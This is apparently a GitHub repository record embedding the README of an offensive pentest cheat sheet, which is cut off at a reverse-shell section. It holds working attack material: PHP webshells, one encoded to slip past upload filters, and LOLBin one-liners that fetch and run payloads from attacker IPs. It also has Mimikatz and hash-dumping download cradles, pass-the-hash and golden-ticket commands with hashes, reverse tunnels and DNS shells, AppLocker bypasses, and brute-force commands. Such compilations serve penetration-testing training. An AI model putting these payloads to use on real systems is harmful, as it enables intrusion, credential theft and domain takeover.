{"id":13538312,"url":"https://github.com/adon90/pentest_compilation","last_synced_at":"2025-10-07T07:22:24.926Z","repository":{"id":37396829,"uuid":"113831461","full_name":"adon90/pentest_compilation","owner":"adon90","description":"Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios","archived":false,"fork":false,"pushed_at":"2022-12-22T17:12:38.000Z","size":448,"stargazers_count":1344,"open_issues_count":3,"forks_count":408,"subscribers_count":72,"default_branch":"master","last_synced_at":"2025-05-23T04:08:17.221Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"XSLT","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/adon90.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-12-11T08:17:52.000Z","updated_at":"2025-05-14T17:39:26.000Z","dependencies_parsed_at":"2023-01-30T14:46:17.603Z","dependency_job_id":null,"html_url":"https://github.com/adon90/pentest_compilation","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/adon90/pentest_compilation","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adon90%2Fpentest_compilation","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adon90%2Fpentest_compilation/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adon90%2Fpentest_compilation/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adon90%2Fpentest_compilation/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/adon90","download_url":"https://codeload.github.com/adon90/pentest_compilation/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adon90%2Fpentest_compilation/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":278737848,"owners_count":26037098,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-07T02:00:06.786Z","response_time":59,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:09.650Z","updated_at":"2025-10-07T07:22:24.891Z","avatar_url":"https://github.com/adon90.png","language":"XSLT","readme":"\u003cb\u003eTable of Contents\u003c/b\u003e\n\n- [Enumeration](#enumeration)\n  * [Generic Enumeration](#genumeration)\n  * [HTTP Enumeration](#httpenumeration)\n  * [SSH Enumeration](#sshenumeration)\n  * [SMB Enumeraion](#smbenumeration)\n  * [SNMP Enumeration](#snmpenumeration)\n- [Explotation](#explotation)\n  * [BOF Based Exploits](#bof)\n  * [Weak Credentials](#weakcreds)\n    * [HTTP Bruteforce](#httpbrute)\n    * [Password Cracking](#passcrack)\n  * [RCE](#rce)\n    * [PHP RCE](#phprce)\n    * [RCE via webshell](#rcewebshell)\n    * [RCE WMIC (powershellless)](#rcewmic)\n    * [LOLBins](#lolbins)\n- [Privilege Escalation](#privesc)\n  * [Linux](#linux)\n  * [Windows](#windows)\n  * [Kernel Exploits](#kernel)\n- [Tunneling \u0026 Port Forwarding](#tunneling)\n  * [SSH over TCP](#sshovertcp)\n  * [TCP over HTTP](#tcpoverhttp)\n    * [1. reGeorg](#regeorg)\n    * [2. ABPTTS](#abptts)\n  *  [HTTP Redirectors](#httpredirectors)\n     * [1. socat](#socatred)\n     * [2. iptables](#iptablesred)\n  * [Windows Socks Proxy](#windowsocks)\n  * [Man's poor VPN](#poor)\n- [Windows Active Directory](#windowsad)\n  * [Bypass Applocker](#applocker)\n  * [Pass The Hash](#pth)\n  * [Kerberos](#krb)\n  * [Miscellaneous](#miscwin)\n- [Reverse Shells](#revshells)\n  * [DNS with dnscat2](#dns)\n  * [ICMP](#icmp)\n  * [HTTP through proxy](#httpproxy)\n- [Miscellaneous](#misc)\n  * [Interactive Reverse Shell](#interactiveshell)\n  * [rbash Jail Escape](#jailescape)\n  * [Windows File Transfer](#windowstransfer)\n  * [Bypass VPN routing restrictions](#vpnrestrict)\n  * [AV Bypass](#avbypass)\n \n  \n  \n  \n  \n---\n\n\n\n\u003ca name=\"enumeration\"\u003e\u003c/a\u003e\u003ch2\u003e Enumeration \u003c/h2\u003e\n\n\u003ca name=\"genumeration\"\u003e\u003c/a\u003e\u003ch3\u003eGeneric Enumeration\u003c/h3\u003e\n\n- port fullscan\n\n- UDP scan\n\n\n\u003ca name=\"httpenumeration\"\u003e\u003c/a\u003e\u003ch3\u003e HTTP Enumeration\u003c/h3\u003e\n\n- dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old\n\n- banner inspection\n\n- review source code\n\n- bruteforce with cewl-based dictionary\n\n- searchsploit look at versions properly\n\n- test all the paths with the exploits, mangle it\n\n- nmap --script vuln\n\n- nmap --script safe (ssl-cert, virtual hosts)\n\n- always incercept with Burp\n\n- nikto -h\n\n- LFI, RFI, SQL, RCE, XXE, SSRF injections\n\n- PUT method all directories\n\n- Change POST body encoding with Burp\n\n- Bruteforce parameter names\n\n- dirsearch with cookie once authenticated\n\n- download vulnerable application from exploit-db and examine it\n\n\u003ca name=\"sshenumeration\"\u003e\u003c/a\u003e\u003ch3\u003eSSH Enumeration\u003c/h3\u003e\n\n- shellshock\n\n- bruteforce\n\n- user_enum\n\n- Debian OpenSSL Predictable PRNG\n\n\u003ca name=\"smbenumeration\"\u003e\u003c/a\u003e\u003ch3\u003eSMB Enumeration\u003c/h3\u003e\n\n- nmap --script vuln\n\n- nmap --script smb*\n\n- nmap --script smb-enum-shares,smb-ls\n\n- enum4linux\n\n\u003ca name=\"snmpenumeration\"\u003e\u003ch3\u003e SNMP Enumeration\u003c/h3\u003e\n\n- snmpcheck\n\n- snmpenum\n\n\u003ca name=\"explotation\"\u003e\u003c/a\u003e\u003ch2\u003e Explotation \u003c/h2\u003e\n\n\u003ca name=\"bof\"\u003e\u003c/a\u003e\u003ch3\u003e BOF exploit-based \u003c/h3\u003e\n\n- change shellcode\n\n- make sure all badchars are removed\n\n- read the exploit properly in case this makes changes in the shellcode\n\n- capture traffic with wireshark making sure the entire shellcode is transmited\n\n- run the exploit several times\n\n- make sure the JMP ESP matches OS and language\n\n\n\u003ca name=\"weakcreds\"\u003e\u003c/a\u003e\u003ch3\u003e Weak Credentials \u003c/h3\u003e\n\n\n\u003ca name=\"httpbrute\"\u003e\u003c/a\u003e\u003cb\u003e HTTP Brute Force \u003c/b\u003e\n\n- wfuzz POST\n\n```wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d \"user=FUZZ\u0026password=FUZ2Z\" http://192.168.30.161/admin/index.php```\n\n- hydra POST\n\n```hydra 192.168.30.161 -s 80 http-form-post \"/admin/index.php:user=^USER^\u0026password=^PASS^:Moved Temporarily\" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20```\n\n- wfuzz NTLM\n\n```wfuzz -c --ntlm \"admin:FUZZ\" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https://\u003cip\u003e/api```\n\n- wfuzz Basic Auth through Proxy\n\n```wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/Activos/names.txt -z file,/root/Documents/Audits/Activos/names.txt --basic \"FUZZ:FUZ2Z\" -p 127.0.0.1:8080 https://\u003cip\u003e/api/v1/```\n\n\n\u003ca name=\"passcrack\"\u003e\u003c/a\u003e\u003cb\u003e Password Cracking \u003c/b\u003e\n\n- zip\n\n`fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip `\n\n- /etc/shadow\n\n\u003cpre\u003e\nunshadow passwd shadow \u003e passwords\njohn --wordlist=/usr/share/wordlists/rockyou.txt passwords\n\u003c/pre\u003e\n\n- keepass \n\n\u003cpre\u003e\nkeepass2john /root/Desktop/NewDatabase.kdb \u003e file\njohn -incremental:alpha -format=keepass file\n\u003c/pre\u003e\n\n- Bruteforce Salted\n\n\u003cpre\u003e\nfor j in $(cat cipher); do echo $j; for i in $(cat digestion); do /root/Documents/HTB/Hawk/bruteforce-salted-openssl/bruteforce-salted-openssl -t 10 -f /usr/share/wordlists/rockyou.txt -c $j -d $i ../miau.txt -1 2\u003e\u00261 | grep \"candidate\" ; done ; done\n\u003c/pre\u003e\n\n\u003cpre\u003eopenssl aes-256-cbc -d -in ../miau.txt -out result.txt -k friends\u003c/pre\u003e\n\n\u003ca name=\"rce\"\u003e\u003c/a\u003e\u003ch2\u003e RCE \u003c/h2\u003e\n\n\u003ca name=\"phprce\"\u003e\u003c/a\u003e\u003ch3\u003ePHP RCE\u003c/h3\u003e\n\ntest: \n\n```\u003c?php phpinfo(); ?\u003e```\n\nsimple shell: \n\n```\u003c?php system($_GET[\"c\"]); ?\u003e```\n\n```\u003c?php `$_GET[\"c\"]`; ?\u003e```\n\nfile upload:\n\n```\u003c?php file_put_contents('/var/www/html/uploads/test.php', '\u003c?php system($_GET[\"c\"]);?\u003e'); ?\u003e```\n\nfile upload evasion:  rot13 + urlencode\n\n```\u003c?php $payload=\"%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E\"; file_put_contents('/var/www/html/uploads/test8.php', str_rot13(urldecode($payload))); ?\u003e```\n\n\n\u003ca name=\"rcewebshell\"\u003e\u003c/a\u003e\u003ch3\u003eRCE via webshell\u003c/h3\u003e\n\n- All pentest monkey reverse shells: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n\n- msfvenom x86/linux/shell_reverse_tcp -f elf\n\n- Metasploit `web_delivery` module\n\n- which wget | nc \u003cip\u003e \u003cport\u003e\n \n\u003ca name=\"rcewmic\"\u003e\u003c/a\u003e\u003ch3\u003eRCE via WMIC\u003c/h3\u003e\n\nPowershell without powershell:\n\nGenerate payload with web_delivery\n\n![powershellless1](https://user-images.githubusercontent.com/7115563/40374533-8da00e10-5de9-11e8-888e-3b1eaccb28b0.png)\n\nEncode Payload\n\n![powershellless2](https://user-images.githubusercontent.com/7115563/40374540-908e0ca8-5de9-11e8-9002-5f03193b10a5.png)\n\nInclude payload in xsl file\n\n![powershellless3](https://user-images.githubusercontent.com/7115563/40374546-92dcda84-5de9-11e8-99c8-9066ae129644.png)\n\n\u003cpre\u003ewmic process get brief /format:\"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl\"\u003c/pre\u003e\n\n![powershellless4](https://user-images.githubusercontent.com/7115563/40375266-73770028-5deb-11e8-92da-952692727bec.png)\n\n\u003ca name=\"lolbins\"\u003e\u003c/a\u003e\u003ch3\u003eLOLBINS\u003c/h3\u003e\n\n\u003cb\u003eSyncAppvPublishingServer\u003c/b\u003e\n\n\u003cpre\u003eSyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('http://192.168.48.129:8000/reverse.ps1') | IEX\"\u003c/pre\u003e\n\n![lolbin1](https://user-images.githubusercontent.com/7115563/40776727-ee904d00-64cb-11e8-8921-407581b13edf.png)\n\n\u003cb\u003erundll32\u003c/b\u003e\n\n\u003cpre\u003erundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();new%20ActiveXObject(\"WScript.Shell\").Run(\"regsvr32 /s /n /u /i:http://192.168.48.130:8080/bhRxgASz0.sct scrobj.dll\")\u003c/pre\u003e\n\n\n\u003ca name=\"privesc\"\u003e\u003c/a\u003e\u003ch2\u003e Privilege Escalation\u003c/h2\u003e\n\n\n\u003ca name=\"linux\"\u003e\u003c/a\u003e\u003ch3\u003e Linux Privilege Escalation \u003c/h3\u003e\n\n- sudo -l\n- Kernel Exploits\n- OS Exploits\n- Password reuse (mysql, .bash_history, 000-default.conf...)\n- Known binaries with suid flag and interactive (nmap)\n- Custom binaries with suid flag either using other binaries or with command execution\n- Writable files owned by root that get executed (cronjobs)\n- MySQL as root\n- Vulnerable services (chkrootkit, logrotate)\n- Writable /etc/passwd\n- Readable .bash_history\n- SSH private key\n- Listening ports on localhost\n- /etc/fstab\n- /etc/exports\n- /var/mail\n- Process as other user (root) executing something you have permissions to modify\n- SSH public key + Predictable PRNG\n- apt update hooking (Pre-Invoke)\n- Capabilities\n\n\u003ca name=\"windows\"\u003e\u003c/a\u003e\u003ch3\u003e Windows Privilege Escalation \u003c/h3\u003e\n\n- Kernel Exploits\n- OS Exploits\n- Pass The Hash\n- Password reuse\n- DLL hijacking (Path)\n- Vulnerable services\n- Writable services binaries path\n- Unquoted services\n- Listening ports on localhost\n- Registry keys\n\n\n\u003ca name=\"kernel\"\u003e\u003c/a\u003e\u003ch3\u003e Kernel Exploits \u003c/h3\u003e\n\nLinux: https://github.com/lucyoa/kernel-exploits\n\nWindows: https://github.com/abatchy17/WindowsExploits\n\n\n\n\u003ca name=\"tunneling\"\u003e\u003c/a\u003e\u003ch2\u003eTunneling \u0026 Port Forwarding\u003c/h2\u003e\n\n\u003ca name=\"sshovertcp\"\u003e\u003c/a\u003e\u003ch3\u003eSSH over HTTP (Squid)\u003c/h3\u003e\n\n\u003cb\u003e socat \u003c/b\u003e\n\n\u003cpre\u003esocat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128\n\nssh john@127.0.0.1 -p 9999\u003c/pre\u003e\n\n\n\u003cb\u003eproxytunnel \u003c/b\u003e\n\n\u003cpre\u003eproxytunnel -p 192.168.1.41:3128 -d 127.0.0.1:22 -a 5555\n\nssh john@127.0.0.1 -p 5555\u003c/pre\u003e\n\n\u003cb\u003eproxychains \u003c/b\u003e\n\n\u003cpre\u003ehttp 192.168.1.41 3128\n\nproxychains ssh john@127.0.0.1\u003c/pre\u003e\n\n![proxychains](https://user-images.githubusercontent.com/7115563/33822522-1e15dbee-de58-11e7-9953-3da8ff684cfc.png)\n\n\n\u003cb\u003ecorkscrew \u003c/b\u003e\n\n\u003cpre\u003essh john@192.168.1.41 -t /bin/sh\u003c/pre\u003e\n\n![cork](https://user-images.githubusercontent.com/7115563/33822672-b92a51f0-de58-11e7-9936-06056b7903b8.png)\n\n\n\u003ca name=\"tcpoverhttp\"\u003e\u003c/a\u003e\u003ch3\u003e TCP over HTTP \u003c/h3\u003e\n\nFor this technique, it is necessary to be able to upload a file to a webserver.\n\n\u003ca name=\"regeorg\"\u003e\u003cb\u003e 1. reGeorg \u003c/b\u003e\n  \n  File upload to the server correct\n  \n  ![regeorge2](https://user-images.githubusercontent.com/7115563/33883424-028c9f0e-df3c-11e7-9559-b35667ae76db.png)\n  \n  Tunnel creation\n  \n  `python reGeorgSocksProxy.py -p 5555 -u \"http://\u003cip\u003e/admin/uploads/reGeorg.jsp\"`\n  \n  Proxychains config\n  \n  ![regeorge1](https://user-images.githubusercontent.com/7115563/33883419-fcc15416-df3b-11e7-89a9-499ffc1de9cf.png)\n  \n  \u003cpre\u003e\nproxychains nmap -F -sT 127.0.0.1\nproxychains mysql -u root -p -h 127.0.0.1\nproxychains ssh localhost\n\u003c/pre\u003e\n\n![regeorge3](https://user-images.githubusercontent.com/7115563/33883422-017021fe-df3c-11e7-8f99-f02de5084c02.png)\n\nReference: https://sensepost.com/discover/tools/reGeorg/\n\n \u003ca name=\"abptts\"\u003e\u003cb\u003e 2. ABBTTS \u003c/b\u003e\n  \nUpload File\n\n![abbtts5](https://user-images.githubusercontent.com/7115563/33883774-6d249ffa-df3d-11e7-9f3f-68bf1e70465f.png)\n\nConfig proxychains and create the tunnel\n\n```python abpttsclient.py -c tomcat_walkthrough/config.txt -u http://192.168.1.128/abptts.jsp -f 127.0.0.1:22222/127.0.0.1:22```\n\nUsage\n\n```ssh -p 22222 user@127.0.0.1```\n\n![abbtts7](https://user-images.githubusercontent.com/7115563/33883891-dc2f3c70-df3d-11e7-84e9-ebd9eab9ebee.png)\n\nReference: https://github.com/nccgroup/ABPTTS\n\n\n\u003ca name=\"httpredirectors\"\u003e\u003ch3\u003eHTTP Redirectors\u003c/h3\u003e\n\n\u003ca name=\"socatred\"\u003e\u003cb\u003e 1. socat \u003c/b\u003e\n \n\u003cpre\u003esocat TCP4-LISTEN:80,fork TCP4:REMOTE-HOST-IP-ADDRESS:80\u003c/pre\u003e\n\n\n![socatt](https://user-images.githubusercontent.com/7115563/42031184-a8b3deee-7ad5-11e8-96ae-9b38bfe82df2.png)\n\n\u003ca name=\"iptablesred\"\u003e\u003cb\u003e 2. iptables \u003c/b\u003e\n \n\u003cpre\u003eiptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT\niptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination REMOTEADDR:80\niptables -t nat -A POSTROUTING -j MASQUERADE\niptables -I FORWARD -j ACCEPT\niptables -P FORWARD ACCEPT\nsysctl net.ipv4.ip_forward=1\u003c/pre\u003e\n\n![iptables](https://user-images.githubusercontent.com/7115563/41294963-97cc925c-6e59-11e8-8adf-8db85f6ffaf2.png)\n\n\n\u003ca name=\"windowsocks\"\u003e\u003c/a\u003e\u003ch3\u003e Windows Socks Proxy \u003c/h3\u003e\n\nIn this case this is going to be used to access Burp listening on a Windows NATed VM from other PCs in the same network as the Windows Host.\n\nFrom the Windows Host machine (IP: 192.168.1.206)\n\n\u003cpre\u003e\nImport-Module .\\Invoke-SocksProxy.psm1\nInvoke-SocksProxy -bindPort 1234\n\u003c/pre\u003e\n\n![invokesocks](https://user-images.githubusercontent.com/7115563/49870467-b63bb480-fe13-11e8-807d-8422e5837b58.png)\n\nFrom other PC on the Windows Host machine network (IP: 192.168.1.69)\n\nConfigure `proxychains.conf`:\n\n\u003cpre\u003e socks4 \t192.168.1.206 1234 \u003c/pre\u003e\n\n\u003cpre\u003eproxychains socat TCP-LISTEN:8081,fork,reuseaddr TCP:192.168.48.158:8080\u003c/pre\u003e\n\nThis command ahead makes Burp (which is listening on the NATed machine) accessible from 192.168.1.69 on port 8081\n\nNow, configure the Proxy in the browser:\n\n![proxyconf](https://user-images.githubusercontent.com/7115563/49870450-aae88900-fe13-11e8-8c95-4208f20cd8ec.png)\n\nAll the traffic is logged on the NATed machine Burp.\n\nReference: https://github.com/p3nt4/Invoke-SocksProxy\n \n \u003cb\u003e Chisel \u003c/b\u003e\n \n Attacker\n \n \u003cpre\u003e\n \n ./chisel_1.7.1_linux_amd64  server -p 8000 --reverse\n \n \u003c/pre\u003e\n \n Victim\n \n \u003cpre\u003e\n \n .\\chisel.exe client 37.187.112.19:8000 R:socks\n \n \u003c/pre\u003e\n \n Attacker\n \n \u003cpre\u003e\n \n proxychains nmap -sT --top-ports --open 10 127.0.0.1\n \n \u003c/pre\u003e\n \n ![chisel](https://user-images.githubusercontent.com/7115563/127473605-6158c455-6d43-4e88-876c-d91422771bd6.png)\n\n \n References: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html\n \n\n\u003ca name=\"poor\"\u003e\u003c/a\u003e\u003ch3\u003e Man's Poor VPN \u003c/h3\u003e\n\nTraffic forward over SSH without needing to ```ssh -D \u003cport\u003e```\n\n\u003cpre\u003esshuttle -vr user@192.168.207.57 1X0.1X.0.0/16\u003c/pre\u003e\n\n![sshuttle](https://user-images.githubusercontent.com/7115563/42047219-02a13b70-7b00-11e8-9686-8bf2f44bee81.png)\n\nProof:\n\n![mantis2](https://user-images.githubusercontent.com/7115563/34785499-a0e7d838-f631-11e7-869f-d6fcdc1051e9.png)\n\nReference: http://teohm.com/blog/using-sshuttle-in-daily-work/\n\n\n\n\u003ca name=\"windowsad\"\u003e\u003c/a\u003e\u003ch2\u003e Windows AD Environment \u003c/h2\u003e\n\n\u003ca name=\"applocker\"\u003e\u003c/a\u003e\u003ch3\u003e Bypass Applocker \u003c/h3\u003e\n\n\u003cb\u003e1. rundll32\u003c/b\u003e\n\n```rundll32.exe PowerShdll.dll,main```\n\n![applocker](https://user-images.githubusercontent.com/7115563/34455568-dfe7d7c6-ed81-11e7-9869-de2d4e92f3aa.png)\n  \n  Reference: https://github.com/p3nt4/PowerShdll\n  \n\u003cb\u003e2. Alternative powershell files\u003c/b\u003e\n\n![applocker2](https://user-images.githubusercontent.com/7115563/34455569-e0136c6a-ed81-11e7-9b0e-127ae9d395e0.png)\n  \n  ```C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise```\n  \n  \n \u003ca name=\"pth\"\u003e\u003c/a\u003e \u003ch3\u003e Pass The Hash \u003c/h3\u003e\n  \n  \n  \u003cb\u003e Invoke a command Remotely \u003c/b\u003e\n  \n  \u003cpre\u003eIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1')\n \n Invoke-WMIExec -Target SVHOST2  -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command \"powershell whoami | out-file \\\\SVHOST2\\C$\\windows\\bitch.txt\"\n\u003c/pre\u003e\n\n  \u003cb\u003e Invoke Mimikatz Remotely \u003c/b\u003e\n  \n  \u003cpre\u003eInvoke-WMIExec -Target SVHOST2  -Username Administrator\n-Hash 78560bbcf70110fbfb5add17b5dfd762 -Command \"powershell -Enc SQBFA...AoA\"\u003c/pre\u003e\n\n![image](https://user-images.githubusercontent.com/7115563/34455757-1f6aed1c-ed86-11e7-9415-595fa5e8d6e7.png)\n  \n  \u003cb\u003e Pass The Hash with Mimikatz \u003c/b\u003e\n  \n  \u003cpre\u003e Invoke-Mimikatz -Command '\"sekurlsa::pth /user:adm_maint /ntlm:cbe55f143fcb6d4687583af520123b89 /domain:lazuli\"'\u003c/pre\u003e\n  \n  \n  \u003ca name=\"krb\"\u003e\u003c/a\u003e\u003ch3\u003e Kerberos \u003c/h3\u003e\n  \n  \n  \u003cb\u003e Generate Golden Ticket (Domain Admin Required) \u003c/b\u003e\n  \n  \u003cpre\u003eInvoke-Mimikatz -Command '\"lsadump::dcsync /domain:LAZULI.CORP /user:krbtgt\"'\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455725-7230ee30-ed85-11e7-9333-16372355ce60.png)\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455734-89934d5c-ed85-11e7-960e-9659e099c9df.png)\n  \n  \u003cpre\u003eInvoke-Mimikatz  -Command '\"kerberos::golden /user:adon /domain:LAZULI.CORP /krbtgt:ca1c2aeda9160094be9971bdc21c50aa /sid:S-1-5-21-1238634245-2147606590-2801756923 /id:500 /ticket:admin.kirbi /ptt\"\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455745-9edd0360-ed85-11e7-84f0-6d62e621613b.png)\n  \n  \u003cpre\u003eInvoke-Mimikatz  -Command '\"kerberos::ptt admin.kirbi\"'\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455747-b285372a-ed85-11e7-9374-c481108db77e.png)\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455748-bb0512c6-ed85-11e7-8d40-b6516cf8b0f3.png)\n  \n \u003ca name=\"miscwin\"\u003e\u003c/a\u003e\u003ch3\u003e Miscellaneous \u003c/h3\u003e\n  \n \u003cb\u003e Invoke Mimikatz \u003c/b\u003e\n  \n  \u003cpre\u003eIEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz\u003c/pre\u003e\n  \n\u003cb\u003e Mimikatz C# \u003c/b\u003e\n\n\u003cpre\u003eC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /unsafe katz.cs\u003c/pre\u003e\n\nhttps://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7\n  \nIn case compiler is outdated:\n\n\u003cpre\u003enuget install Microsoft.Net.Compilers\u003c/pre\u003e\n  \n   \u003cb\u003e Runas Powershell \u003c/b\u003e\n  \n  ```Start-Process powershell.exe -Verb runas```\n  ```Start-Process powershell.exe -Credential \u003cuser\u003e```\n  \n  \u003cb\u003e View Shares With Permissions \u003c/b\u003e\n  \n  \u003cpre\u003epowershell.exe -exec bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder -CheckShareAccess\"\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455620-34f292b4-ed83-11e7-92b0-3b8dd387146f.png)\n  \n  \n  \u003cb\u003e View files that contain certain words recursively \u003c/b\u003e\n  \n  \u003cpre\u003e ls -Path \\\\SVHOST1.LAZULI.CORP\\tmp$ -Include \"*pass*\",\"*\nadmin*\",\"*secret*\" -Recurse -ErrorAction SilentlyContinue\u003c/pre\u003e\n\n![image](https://user-images.githubusercontent.com/7115563/34455641-aa03adf4-ed83-11e7-8333-a69366714921.png)\n\n\u003cb\u003e View files which name contains certain words recursively \u003c/b\u003e\n\n\u003cpre\u003edir -Path \\\\SVHOST1.LAZULI.CORP -Include \"*pass*\",\"*admin*\",\"*secret*\" -Recurse -ErrorAction SilentlyContinue\u003c/pre\u003e\n\n![image](https://user-images.githubusercontent.com/7115563/34455649-dcc941ea-ed83-11e7-9428-a702f254e807.png)\n\n\u003cb\u003e Connect to MSSQL Database \u003c/b\u003e\n\n\u003cpre\u003eIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/michaellwest/PowerShell-Modules/master/CorpApps/Invoke-SqlCommand.ps1')\n\nInvoke-SqlCommand -Server 172.11.14.89 -Database master -Username sa -Password \u003cpassword\u003e -Query \"exec sp_databases\" \u003c/pre\u003e\n\n\u003cb\u003e Port Scanning \u003c/b\u003e\n\n\u003cpre\u003eIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1')\n\nInvoke-Portscan -Hosts [ip] -TopPorts 50\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455679-6e630230-ed84-11e7-995e-2eea1a6fc8dc.png)\n  \n  \n  \u003cb\u003e View Domain Admins \u003c/b\u003e\n  \n  \u003cpre\u003e net groups /domain \"Domain Admins\"\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455690-9e648d78-ed84-11e7-9a84-9b335530a31e.png)\n  \n  \u003cb\u003e View Domain Controlers \u003c/b\u003e\n  \n  \u003cpre\u003enltest /dclist:\u003cdomain\u003e \u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455698-d1504074-ed84-11e7-85ad-c4bb196c9d44.png)\n  \n\n  \n\u003cb\u003e Get Hashes \u003c/b\u003e\n\n\u003cpre\u003eIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes\u003c/pre\u003e\n\n  ![image](https://user-images.githubusercontent.com/7115563/34455769-66cb31bc-ed86-11e7-846e-090647d8e32f.png)\n  \n  \n\u003cb\u003e Check Pass The Hash with multiple servers\u003c/b\u003e\n\n\u003cpre\u003e$hosts = @(\"SVDC1.LAZULI.CORP\",\"SVFILES.LAZULI.CORP\",\"SVHOST1.LAZULI.CORP\",\"SVHOST2.LAZULI.CORP\",\"SVFILES2.LAZULI.CORP\")\n\nforeach ($h in $hosts){ Invoke-WMIExec -Target $h -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command \"hostname\" -Verbose }\n\n\u003c/pre\u003e\n\n![image](https://user-images.githubusercontent.com/7115563/34455798-0bdc77ec-ed87-11e7-9504-6b9ec6fc2a8d.png)\n\n\u003cb\u003e Run web_delivery with other identity \u003c/b\u003e\n\n\u003cpre\u003e runas-cabesha-webdelivery -url [url_webdelivery] -user [url] -pass [pass] \u003c/pre\u003e\n\n![cabesha](https://user-images.githubusercontent.com/7115563/42811084-e286eb5a-89b9-11e8-8ec8-b0b8c3980774.jpg)\n\n\nReferences: https://www.hacklikeapornstar.com/\n  \n\n\n\u003ca name=\"revshells\"\u003e\u003c/a\u003e\u003ch2\u003e Reverse Shells \u003c/h2\u003e\n\n\u003ca name=\"dns\"\u003e\u003c/a\u003e\u003ch3\u003e Reverse DNS Shell with dnscat powershell \u003c/h3\u003e\n\n\u003cb\u003e Server \u003c/b\u003e\n\n\u003cpre\u003eruby dnscat2.rb -e open --no-cache tunnel.domain.com\u003c/pre\u003e\n\n\n\u003cb\u003e Client \u003c/b\u003e\n\n\u003cpre\u003eIEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain tunnel.domain.com -DNSServer 8.8.4.4 \u003c/pre\u003e\n\n\n![dns](https://user-images.githubusercontent.com/7115563/35040679-5a155bfa-fb82-11e7-98ec-ba015e3ad69c.png)\n\nReference: https://github.com/lukebaggett/dnscat2-powershell\n\n\n\u003ca name=\"icmp\"\u003e\u003c/a\u003e\u003ch3\u003e Reverse ICMP shell \u003c/h3\u003e\n\n\u003cb\u003e Server 